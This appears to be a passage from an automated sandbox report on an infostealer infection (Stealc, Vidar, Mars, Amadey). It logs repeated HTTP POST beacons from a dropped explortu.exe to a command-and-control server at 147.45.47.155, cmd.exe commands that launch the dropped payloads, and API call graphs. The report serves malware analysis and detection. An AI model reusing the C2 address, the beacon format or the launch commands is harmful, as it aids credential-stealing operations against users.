                                                                Jun 27, 2024 06:00:02.690073967 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 04:00:02 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 06:00:02.690891027 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 06:00:02.901916027 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 04:00:02 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                59192.168.2.649788147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 06:00:03.021507025 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 06:00:03.692101002 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 04:00:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                60192.168.2.649789147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 06:00:03.700114012 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 06:00:04.368448973 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 04:00:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                61192.168.2.649790147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 06:00:04.639971018 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 06:00:05.340662956 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 04:00:05 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                62192.168.2.649791147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 06:00:05.350438118 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 06:00:06.038373947 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 04:00:05 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                63192.168.2.649792147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 06:00:06.163331032 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 06:00:06.858150005 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 04:00:06 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                64192.168.2.649793147.45.47.15580
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 06:00:06.868797064 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 06:00:07.539685965 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 04:00:07 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:23:58:00
                                                                Start date:26/06/2024
                                                                Path:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\wqmnYoVbHr.exe"
                                                                Imagebase:0x580000
                                                                File size:2'515'456 bytes
                                                                MD5 hash:278754C8F6050D4BBF4D9A243F048429
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2291406262.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2290413954.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.2290413954.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:23:58:18
                                                                Start date:26/06/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe"
                                                                Imagebase:0x1c0000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:23:58:18
                                                                Start date:26/06/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff66e660000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:23:58:18
                                                                Start date:26/06/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EHCBAAAFHJ.exe"
                                                                Imagebase:0x1c0000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:7
                                                                Start time:23:58:18
                                                                Start date:26/06/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff66e660000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:8
                                                                Start time:23:58:18
                                                                Start date:26/06/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe"
                                                                Imagebase:0x5c0000
                                                                File size:1'902'080 bytes
                                                                MD5 hash:EBD6A9BB1E8E1C7357A9426791B6D14F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.2394465474.00000000005C1000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.2305772420.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:23:58:25
                                                                Start date:26/06/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe"
                                                                Imagebase:0x450000
                                                                File size:1'902'080 bytes
                                                                MD5 hash:EBD6A9BB1E8E1C7357A9426791B6D14F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000003.2372578172.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.2412717036.0000000000451000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:13
                                                                Start time:23:59:00
                                                                Start date:26/06/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                Imagebase:0x450000
                                                                File size:1'902'080 bytes
                                                                MD5 hash:EBD6A9BB1E8E1C7357A9426791B6D14F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000003.2714164335.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:14
                                                                Start time:23:59:06
                                                                Start date:26/06/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe"
                                                                Imagebase:0x720000
                                                                File size:2'515'456 bytes
                                                                MD5 hash:278754C8F6050D4BBF4D9A243F048429
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000E.00000002.2783356868.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000E.00000002.2783356868.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000002.2784688006.0000000001BB4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 53%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:0.4%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:30%
                                                                  Total number of Nodes:110
                                                                  Total number of Limit Nodes:12
                                                                  execution_graph 45780 6c8fb8ae 45781 6c8fb8ba ___scrt_is_nonwritable_in_current_image 45780->45781 45782 6c8fb8e3 dllmain_raw 45781->45782 45783 6c8fb8de 45781->45783 45791 6c8fb8c9 45781->45791 45784 6c8fb8fd dllmain_crt_dispatch 45782->45784 45782->45791 45793 6c8dbed0 DisableThreadLibraryCalls LoadLibraryExW 45783->45793 45784->45783 45784->45791 45786 6c8fb91e 45787 6c8fb94a 45786->45787 45794 6c8dbed0 DisableThreadLibraryCalls LoadLibraryExW 45786->45794 45788 6c8fb953 dllmain_crt_dispatch 45787->45788 45787->45791 45789 6c8fb966 dllmain_raw 45788->45789 45788->45791 45789->45791 45792 6c8fb936 dllmain_crt_dispatch dllmain_raw 45792->45787 45793->45786 45794->45792 45795 6c8fb694 45796 6c8fb6a0 ___scrt_is_nonwritable_in_current_image 45795->45796 45825 6c8faf2a 45796->45825 45798 6c8fb6a7 45799 6c8fb796 45798->45799 45800 6c8fb6d1 45798->45800 45811 6c8fb6ac ___scrt_is_nonwritable_in_current_image 45798->45811 45842 6c8fb1f7 IsProcessorFeaturePresent 45799->45842 45829 6c8fb064 45800->45829 45803 6c8fb6e0 __RTC_Initialize 45803->45811 45832 6c8fbf89 InitializeSListHead 45803->45832 45805 6c8fb7b3 ___scrt_uninitialize_crt __RTC_Initialize 45806 6c8fb6ee ___scrt_initialize_default_local_stdio_options 45810 6c8fb6f3 _initterm_e 45806->45810 45807 6c8fb79d ___scrt_is_nonwritable_in_current_image 45807->45805 45808 6c8fb828 45807->45808 45809 6c8fb7d2 45807->45809 45814 6c8fb1f7 ___scrt_fastfail 6 API calls 45808->45814 45846 6c8fb09d _execute_onexit_table _cexit ___scrt_release_startup_lock 45809->45846 45810->45811 45813 6c8fb708 45810->45813 45833 6c8fb072 45813->45833 45815 6c8fb82f 45814->45815 45820 6c8fb86e dllmain_crt_process_detach 45815->45820 45821 6c8fb83b 45815->45821 45816 6c8fb7d7 45847 6c8fbf95 __std_type_info_destroy_list 45816->45847 45819 6c8fb70d 45819->45811 45822 6c8fb711 _initterm 45819->45822 45824 6c8fb840 45820->45824 45823 6c8fb860 dllmain_crt_process_attach 45821->45823 45821->45824 45822->45811 45823->45824 45826 6c8faf33 45825->45826 45848 6c8fb341 IsProcessorFeaturePresent 45826->45848 45828 6c8faf3f ___scrt_uninitialize_crt 45828->45798 45849 6c8faf8b 45829->45849 45831 6c8fb06b 45831->45803 45832->45806 45834 6c8fb077 ___scrt_release_startup_lock 45833->45834 45835 6c8fb07b 45834->45835 45836 6c8fb082 45834->45836 45859 6c8fb341 IsProcessorFeaturePresent 45835->45859 45839 6c8fb087 _configure_narrow_argv 45836->45839 45838 6c8fb080 45838->45819 45840 6c8fb095 _initialize_narrow_environment 45839->45840 45841 6c8fb092 45839->45841 45840->45838 45841->45819 45843 6c8fb20c ___scrt_fastfail 45842->45843 45844 6c8fb218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 45843->45844 45845 6c8fb302 ___scrt_fastfail 45844->45845 45845->45807 45846->45816 45847->45805 45848->45828 45850 6c8faf9e 45849->45850 45851 6c8faf9a 45849->45851 45852 6c8fb028 45850->45852 45854 6c8fafab ___scrt_release_startup_lock 45850->45854 45851->45831 45853 6c8fb1f7 ___scrt_fastfail 6 API calls 45852->45853 45855 6c8fb02f 45853->45855 45856 6c8fafb8 _initialize_onexit_table 45854->45856 45858 6c8fafd6 45854->45858 45857 6c8fafc7 _initialize_onexit_table 45856->45857 45856->45858 45857->45858 45858->45831 45859->45838 45860 6c8c35a0 45861 6c8c35c4 InitializeCriticalSectionAndSpinCount getenv 45860->45861 45876 6c8c3846 __aulldiv 45860->45876 45862 6c8c38fc strcmp 45861->45862 45867 6c8c35f3 __aulldiv 45861->45867 45866 6c8c3912 strcmp 45862->45866 45862->45867 45864 6c8c35f8 QueryPerformanceFrequency 45864->45867 45865 6c8c38f4 45866->45867 45867->45864 45868 6c8c3622 _strnicmp 45867->45868 45869 6c8c3944 _strnicmp 45867->45869 45871 6c8c395d 45867->45871 45872 6c8c3664 GetSystemTimeAdjustment 45867->45872 45875 6c8c375c 45867->45875 45868->45867 45868->45869 45869->45867 45869->45871 45870 6c8c376a QueryPerformanceCounter EnterCriticalSection 45873 6c8c37b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 45870->45873 45870->45875 45872->45867 45874 6c8c37fc LeaveCriticalSection 45873->45874 45873->45875 45874->45875 45874->45876 45875->45870 45875->45873 45875->45874 45875->45876 45877 6c8fb320 5 API calls ___raise_securityfailure 45876->45877 45877->45865 45878 6c8c3060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 45883 6c8fab2a 45878->45883 45882 6c8c30db 45887 6c8fae0c _crt_atexit _register_onexit_function 45883->45887 45885 6c8c30cd 45886 6c8fb320 5 API calls ___raise_securityfailure 45885->45886 45886->45882 45887->45885 45888 913b8c 45889 913b99 VirtualAlloc 45888->45889 45891 6c8dc930 GetSystemInfo VirtualAlloc 45892 6c8dc9a3 GetSystemInfo 45891->45892 45893 6c8dc973 45891->45893 45895 6c8dc9b6 45892->45895 45896 6c8dc9d0 45892->45896 45907 6c8fb320 5 API calls ___raise_securityfailure 45893->45907 45895->45896 45898 6c8dc9bd 45895->45898 45896->45893 45899 6c8dc9d8 VirtualAlloc 45896->45899 45897 6c8dc99b 45898->45893 45900 6c8dc9c1 VirtualFree 45898->45900 45901 6c8dc9ec 45899->45901 45902 6c8dc9f0 45899->45902 45900->45893 45901->45893 45908 6c8fcbe8 GetCurrentProcess TerminateProcess 45902->45908 45907->45897 45909 6c8fb9c0 45910 6c8fb9ce dllmain_dispatch 45909->45910 45911 6c8fb9c9 45909->45911 45913 6c8fbef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 45911->45913 45913->45910

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C94F688,00001000), ref: 6C8C35D5
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C8C35E0
                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 6C8C35FD
                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C8C363F
                                                                  • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C8C369F
                                                                  • __aulldiv.LIBCMT ref: 6C8C36E4
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C8C3773
                                                                  • EnterCriticalSection.KERNEL32(6C94F688), ref: 6C8C377E
                                                                  • LeaveCriticalSection.KERNEL32(6C94F688), ref: 6C8C37BD
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C8C37C4
                                                                  • EnterCriticalSection.KERNEL32(6C94F688), ref: 6C8C37CB
                                                                  • LeaveCriticalSection.KERNEL32(6C94F688), ref: 6C8C3801
                                                                  • __aulldiv.LIBCMT ref: 6C8C3883
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C8C3902
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C8C3918
                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C8C394C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                  • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                  • API String ID: 301339242-3790311718
                                                                  • Opcode ID: 21ceea013e5630dba9e986d767d1d4c6c33c55cb338447e8ad391a93c485f6c5
                                                                  • Instruction ID: f7ddb69e991b164eab475024db2f92dabf7db9a5e54ef07992a9035c6fbaddf6
                                                                  • Opcode Fuzzy Hash: 21ceea013e5630dba9e986d767d1d4c6c33c55cb338447e8ad391a93c485f6c5
                                                                  • Instruction Fuzzy Hash: 56B1AE71B093159BDB18EF28C94465ABBF5BB8A708F24C92EE899D3750D730DD058B82

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C8DC947
                                                                  • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C8DC969
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C8DC9A9
                                                                  • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C8DC9C8
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C8DC9E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocInfoSystem$Free
                                                                  • String ID:
                                                                  • API String ID: 4191843772-0
                                                                  • Opcode ID: 7537d2c57aae2413dc90fdcc1de37f57d2193a64b404a0e93096ff6d2d6ad64e
                                                                  • Instruction ID: a576a47941da979a920814ce110197b770b21faf447812e9e5b68358bccab913
                                                                  • Opcode Fuzzy Hash: 7537d2c57aae2413dc90fdcc1de37f57d2193a64b404a0e93096ff6d2d6ad64e
                                                                  • Instruction Fuzzy Hash: 21212C327456147BDB24BA68CD84BAE73B9AB4634CF714929F907A7681DB707C00C790

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C8C3095
                                                                    • Part of subcall function 6C8C35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C94F688,00001000), ref: 6C8C35D5
                                                                    • Part of subcall function 6C8C35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C8C35E0
